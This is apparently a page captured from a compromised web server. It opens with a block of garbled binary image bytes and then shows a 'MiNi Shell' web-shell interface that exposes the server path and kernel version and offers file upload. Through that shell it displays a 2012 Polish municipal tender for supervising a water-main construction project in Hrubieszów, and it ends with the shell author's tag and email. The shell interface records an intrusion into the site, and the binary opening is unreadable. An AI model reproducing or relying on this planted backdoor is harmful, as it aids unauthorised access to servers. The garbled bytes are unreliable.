JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120109/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120109/7761-N-2012.html

<p class="kh_header"><b>Hrubieszów: Pełnienie nadzoru inwestorskiego w zakresie branży: sanitarnej
i elektrycznej dla zadania pn.: Budowa wodociągu na terenie Gminy Hrubieszów</b><br>
<b>Numer ogłoszenia: 7761 - 2012; data zamieszczenia: 09.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Hrubieszów , ul. B. Prusa 8, 22-500 Hrubieszów, woj. lubelskie, tel. 0 84 696 26 81, faks 0 84 696 27 94.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.hrubieszow-gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego w zakresie branży: sanitarnej
i elektrycznej dla zadania pn.: Budowa wodociągu na terenie Gminy Hrubieszów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie nadzoru inwestorskiego w zakresie branży: sanitarnej
i elektrycznej dla zadania pn.: Budowa wodociągu na terenie Gminy Hrubieszów realizowanego w dwóch etapach m. Brodzica, Husynne, Moroczyn, Dziekanów.
Zakres I etapu obejmuje: budowę sieci wodociągowej z przyłączami i punktami czerpalnymi jn:
- budowa sieci wodociągowej:
       - z rur PCV Dn  150 mm                              - 12.669 m:
       - z rur PCV Dn  100 mm                              -   8.751 m;
       - z rur    PE Dn    50 mm                              -      972 m;
       - z rur    PE Dn    32 mm                              -      389 m;
- budowa przyłączy wodociągowych z punktami czerpalnymi:
       - z rur PE Dn       50 mm                              -   2.321 m;
       - z rur PE i stal. ocynkowanych Dn 32 mm -   5.616 m;
       - punkty czerpalne                                        -      208 szt;
       - studzienki spustowe                                   -        10 szt;
       - punkt poboru wody dla sanepidu               -          2 szt

Umowny termin zakończenia I etapu do dnia 30.11.2012 r.

Etap II budowa sieci wodociągowej z przyłączami i punktami czerpalnymi w m. Turkołówka, Wołajowice, Ubrodowice, Moniatycze, Moniatycze Kolonia, Czortowice i Gródek  wraz z pompownią strefową w m. Szpikołosy, Kobło, Dziekanów.
Zakres II etapu obejmuje: budowę sieci wodociągowej z przyłączami i punktami czerpalnymi wraz z pompownią strefowa jn:
  - budowa sieci wodociągowej:
          - z rur PCV Dn 150 mm                                    -  10.859 m;
          - z rur PCV Dn 100 mm                                    -  20.816 m;
          - z rur    PE Dn   50 mm                                    -       640 m;
          - z rur    PE Dn   32 mm                                    -       860 m;
          - przepompownia wody                                     -           1 szt;
- budowa przyłączy wodociągowych z punktami czerpalnymi:
          - z rur PE Dn     50 mm                                     -     2.499 m;
          - z rur PE i stal. ocynkowanych Dn 32mm       -          7.871 m;
          - punkty czerpalne                                             -        315 szt;
          - studzienki spustowe                                        -            8 szt;
          - punkty poboru wody dla sanepidu                  -            2 szt;
 Nadzór branży elektrycznej pełniony będzie w II  etapie, rozpoczęcie prac nastąpi nie 
 wcześniej niż w m-cu sierpniu 2012 r. obejmują roboty elektryczne: przepompownia wody-
 linie kablowe zalicznikowe, instalacje w pompowni, instalacje w zbiorniku. 
 Umowny termin zakończenia II etapu do dnia 31.01.2014 r.
 Termin gwarancji na wykonane roboty obejmuje 36 miesięcy od ostatecznego odbioru robót.
 Wartość robót budowlanych nad którym będzie sprawowany nadzór inwestorski ( branża sanitarna, elektryczna i budowlana) wynosi:  4.172.037,00 zł brutto ( słownie złotych: cztery miliony sto siedemdziesiąt dwa tysiące trzydzieści siedem złotych 00/100)w tym:
 - branża sanitarna:     3.965.585,14 zł
 - branża elektryczna:      48.138,28 zł

Przedmiot zamówienia obejmuje pełnienie funkcji inspektora nadzoru inwestorskiego w zakresie  branży: sanitarnej i elektrycznej. Do obowiązków Wykonawcy należy:
- wydawanie poleceń i instrukcji wykonawcy robót budowlanych celem prawidłowego
  i rzetelnego wykonania prac określonych umowie z Wykonawcą robót, 
- przyjmowanie wniosków od Wykonawcy robót budowlanych o wykonanych pracach, 
  opiniowanie i przedstawianie do akceptacji Zamawiającemu,  
- prawo wstrzymania robót, jeśli jest to konieczne dla ich prawidłowego wykonania oraz w
  przypadku, gdy Wykonawca nie wypełnia swych obowiązków z należytą starannością,
  wiedzą techniczną i postanowieniami zawartej z nim umowy, 
- kontrole jakości używanych materiałów zgodnie z prawem, żądania dodatkowych badań
  jakościowych, a w szczególności obowiązkowy odbiór przedstawionych przez Wykonawcę
  robót, certyfikatów i deklaracji zgodności materiałów przed ich wbudowaniem,
- żądanie usunięcia przez Wykonawcę robót ujawnionych wad w jakości prac oraz określenie
  zakresu koniecznego do wykonania robót poprawkowych, poświadczenie usunięcia przez
  Wykonawcę robót wad wykonanych robót, wnioskowanie o potrącenie wynagrodzenia
  Wykonawcy kar umownych w przypadku nie usunięcia tych wad,
- dokonywanie odbiorów częściowych, zwłaszcza prac zanikających i ulegających zakryciu,
- udział w czynnościach odbioru końcowego, gwarancyjnego i pogwarancyjnego.
  W ramach tych czynności Inspektor zobowiązany jest do:
   - stwierdzenia gotowości do odbioru,
   - przekazanie Zamawiającemu protokołów odbioru oraz dokumentacji powykonawczej.
- potwierdzenie faktyczne wykonywanych robót oraz usunięcia wad,
- sprawdzanie obmiarów robót jako podstawy do zapłaty wynagrodzenia Wykonawcy robót,
- udzielanie odpowiedzi i wyjaśnień w trakcie kontroli przeprowadzanych przez Departament
  Koordynacji Projektów Europejskich, Urzędu Marszałkowskiego w Lublinie oraz instytucji
  kontrolujące UE   
Inspektor nadzoru inwestorskiego ma prawo:
- wydawać kierownikowi budowy lub kierownikowi robót polecenia, potwierdzone wpisem 
  do dziennika budowy, dotyczące usunięcia nieprawidłowości lub zagrożeń, wykonania prób 
  i badań, robót lub elementów zakrytych wymagających odkrycia oraz  przedstawienia 
  ekspertyz związanych z prowadzonymi robotami budowlanymi i dowodów dopuszczenia do 
  stosowania w budownictwie wyrobów budowlanych oraz urządzeń technicznych,
- żądać od kierownika budowy lub kierownika robót dokonania poprawek bądź ponownego 
  wykonania wadliwie wykonanych robót, a także wstrzymania dalszych robót budowlanych 
  w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie lub spowodować 
  niedopuszczalna niezgodność z projektem lub pozwoleniem na budowę, 
- w razie stwierdzenia realizacji przedmiotu umowy w sposób wadliwy lub sprzeczny z
  umową wystawić stosowne wnioski dla Zamawiającego, łącznie z wnioskiem o odstąpienie od 
  umowy z winy Wykonawcy robót budowlanych ze skutkami przewidzianymi z tego tytułu,
- kontrolowanie szczegółowych rozliczeń budowy, zgodnie z zapisami umowy z wykonawcą 
  robót,
- sprawdzanie posiadanych przez wykonawcę robót odpowiednich dokumentów, uprawnień
  atestów, wyników badań itp. dotyczących wykonania robót oraz dostarczonych materiałów
  i urządzeń. Przedmiot zamówienia obejmuje również obecność w przeglądach gwarancyjnych
  w okresie gwarancji udzielonej na roboty budowlane.
Zgodnie z art. 36. ust. 4 ustawy wykonawca zobowiązany jest do wskazania w ofercie części zamówienia, której wykonanie powierzy podwykonawcom.
Inwestycja realizowana jest przy współfinansowaniu środków Unii Europejskiej w ramach działania 321 ( Podstawowe usługi dla gospodarki i ludności wiejskiej) Programu Rozwoju Obszarów Wiejskich na lata 2007-2013.
Określenie przedmiotu zamówienia wg Wspólnego Słownik Zamówień  CPV:
 71.24.70.00-1 Nadzór nad robotami budowlanymi..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 8.1.  Warunkiem udziału w postępowaniu jest wniesienie wadium. Zamawiający określa wadium na kwotę 1.000,00 zł. (słownie: jeden tysiąc złotych 00/100).
Wadium wnosi się przed terminem składania ofert w jednej lub kilku następujących formach:
1)	  pieniądzu;
2)	  poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
	3)	gwarancjach bankowych;
	4)	gwarancjach ubezpieczeniowych;
	5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek Zamawiającego nr 22124028291111000040270283 z dopiskiem: wadium - pełnienie nadzoru inwestorskiego
dla zadania pn. Budowa wodociągu na terenie Gminy Hrubieszów.
O uznaniu przez Zamawiającego, że wadium w pieniądzu wpłacono w wymaganym terminie, decyduje data wpływu środków na rachunek zamawiającego. W przypadku wniesienia wadium w innej formie niż pieniężna zamawiający dopuszcza aby dokument gwarancyjny wykonawca dołączył do oferty.
8.2. Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt 8.4. siwz.
Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwróci wadium niezwłocznie po zawarciu umowy.
8.3. Zamawiający zwróci wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. 
8.4. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w części 6 siwz, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
8.5. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
       1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
       2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.1.1.	posiadania uprawnień do wykonywania określonej działalności i czynności; 
	Ocena spełniania ww. warunku udziału w postępowaniu dokonana będzie na podstawie przedłożonego do oferty oświadczenia o spełnieniu warunków udziału w postępowaniu (wzór oświadczenia stanowi zał. nr 2 specyfikacji istotnych warunków zamówienia - pkt 1 oświadczenia) wg zasady spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania wiedzy i doświadczenia; 
tj. wykonali w okresie ostatnich 3 lat, przed upływem
         terminu składania ofert, a jeżeli okres  prowadzenia jest krótszy - w tym okresie,
         co najmniej 1 usługę nadzoru inwestorskiego o wartości 10.000,00 zł brutto przy
         inwestycji (jako jednego zadania) polegającej na budowie sieci wodociągowej.
        Zamawiający uzna  za spełniony ww. warunek udziału w postępowaniu jeżeli
        wykonawca przedłoży do oferty oświadczenie o spełnieniu warunków udziału
        w postępowaniu ( wzór oświadczenia stanowi zał. nr 2 specyfikacji istotnych 
        warunków zamówienia - pkt 2 oświadczenia) i dokumentu (wykazu usług - wypełnionego zał. nr 5 siwz) - wg zasady spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania odpowiednim potencjałem  technicznym;
                      Zamawiający uzna za spełniony ww. warunek udziału w postępowaniu jeżeli wykonawca załączy do oferty oświadczenie o spełnieniu warunków udziału w postępowaniu ( wzór oświadczenia stanowi zał. nr 2 specyfikacji istotnych warunków zamówienia - pkt 3 oświadczenia)  - wg zasady spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania osobami zdolnymi do wykonania zamówienia tj:
- dysponują co najmniej jedną osobą uprawnioną do pełnienia funkcji inspektora nadzoru inwestorskiego - uprawnienia budowlane w specjalności sieci instalacyjnej w zakresie sieci wodociągowej zgodnie z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie ( Dz. U. Nr 83,poz.578 z póź. zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów i wpisaną na listę członków izby samorządu zawodowego;
- dysponują co najmniej jedną osobą uprawnioną do pełnienia funkcji inspektora nadzoru  inwestorskiego - uprawnienia do kierowania robotami budowlanymi
w specjalności  instalacyjnej w zakresie sieci elektrycznej i urządzeń elektrycznych
zgodnie rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. Nr 83 poz. 578 z późn. zm.) lub odpowiadające im ważne  uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów i wpisaną na listę
                       członków izby samorządu zawodowego;
                      Zamawiający uzna za spełniony ww. warunek udziału w postępowaniu jeżeli wykonawca załączy do oferty oświadczenie o spełnieniu warunków udziału w postępowaniu ( wzór oświadczenia stanowi zał. nr 2 specyfikacji istotnych warunków zamówienia - pkt 3 oświadczenia ) i dokumentu (oświadczenia - zał. nr 4 siwz) - wg zasady spełnia/ nie spełnia;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>sytuacji ekonomicznej i finansowej;
          Zamawiający uzna  za spełniony ww. warunek udziału w postępowaniu jeżeli 
          wykonawca załączy do oferty oświadczenie o spełnieniu warunków udziału w
          postępowaniu ( wzór oświadczenia stanowi zał. nr 2 siwz - pkt 4 oświadczenia) - wg 
         zasady spełnia/ nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający  dopuszcza zmianę postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy wyłącznie w sytuacji gdy wprowadzenie tych zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawierania umowy lub zmiany te są nieistotne albo korzystne dla zamawiającego. 
       W przypadku gdy ulegnie zmianie termin skutecznego ostatecznego odbioru robót 
        zmianie podlegać będzie termin wykonania usługi</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.hrubieszow-gmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Hrubieszów
ul. B. Prusa 8
22-500 Hrubieszów
pokój nr 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.01.2012 godzina 10:00, miejsce: Urząd Gminy Hrubieszów
ul. B. Prusa 8
22-500 Hrubieszów
pokój nr 15 /sekretariat/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja realizowana jest przy współfinansowaniu środków Unii Europejskiej w ramach działania 321 ( Podstawowe usługi dla gospodarki i ludności wiejskiej) Programu Rozwoju Obszarów Wiejskich na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com